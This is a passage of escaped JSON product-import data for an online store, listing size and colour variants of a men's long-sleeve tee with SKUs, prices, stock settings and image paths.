/m\\/s\\/ms07-green_alt1.jpg,\\/m\\/s\\/ms07-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"549\":{\"sku\":\"MS07-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-S-White\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"550\":{\"sku\":\"MS07-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-M-Black\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"551\":{\"sku\":\"MS07-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-M-Green\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms07-green_alt1.jpg,\\/m\\/s\\/ms07-green_back.jpg\",\"image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms07-green_alt1.jpg,\\/m\\/s\\/ms07-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"552\":{\"sku\":\"MS07-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-M-White\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"553\":{\"sku\":\"MS07-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-L-Black\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"554\":{\"sku\":\"MS07-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-L-Green\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms07-green_alt1.jpg,\\/m\\/s\\/ms07-green_back.jpg\",\"image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms07-green_alt1.jpg,\\/m\\/s\\/ms07-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"555\":{\"sku\":\"MS07-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-L-White\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"556\":{\"sku\":\"MS07-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-XL-Black\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"557\":{\"sku\":\"MS07-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-XL-Green\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",